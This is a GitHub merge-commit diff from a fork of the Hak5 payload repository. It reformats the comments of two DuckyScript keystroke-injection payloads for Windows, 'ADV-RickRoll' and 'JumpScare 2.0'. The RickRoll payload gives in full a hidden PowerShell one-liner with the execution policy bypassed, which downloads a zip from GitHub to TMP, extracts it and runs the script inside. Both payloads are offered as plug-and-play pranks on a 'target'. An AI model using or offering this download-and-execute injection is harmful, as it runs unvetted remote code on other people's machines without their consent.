Merge branch 'hak5:master' into master

pull/277/head
0iphor13 2023-04-19 10:00:37 +02:00 committed by GitHub
commit 406377e308
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 16 additions and 16 deletions

View File

@ -1,18 +1,18 @@
* Title: ADV-RickRoll REM Title: ADV-RickRoll
* Author: I am Jakoby REM Author: I am Jakoby
* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
* Upon deployment payload will pause until a mouse movement is detected and run once one is. REM Upon deployment payload will pause until a mouse movement is detected and run once one is.
* Target: Windows 10, 11 REM Target: Windows 10, 11
* -------------------------------------------------------------------------------------- REM --------------------------------------------------------------------------------------
* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
* -------------------------------------------------------------------------------------- REM --------------------------------------------------------------------------------------
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1
ENTER ENTER

View File

@ -1,14 +1,14 @@
* Title: JumpScare 2.0 REM Title: JumpScare 2.0
* Author: I am Jakoby REM Author: I am Jakoby
* Description: This is a one liner payload that will execute and wait until a mouse movement is detected. Once one is a jumpscare will be played at max volume in full screen REM Description: This is a one liner payload that will execute and wait until a mouse movement is detected. Once one is a jumpscare will be played at max volume in full screen
* Target: Windows 10, 11 REM Target: Windows 10, 11
* -------------------------------------------------------------------------------------- REM --------------------------------------------------------------------------------------
* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
* -------------------------------------------------------------------------------------- REM --------------------------------------------------------------------------------------
DELAY 2000 DELAY 2000
GUI r GUI r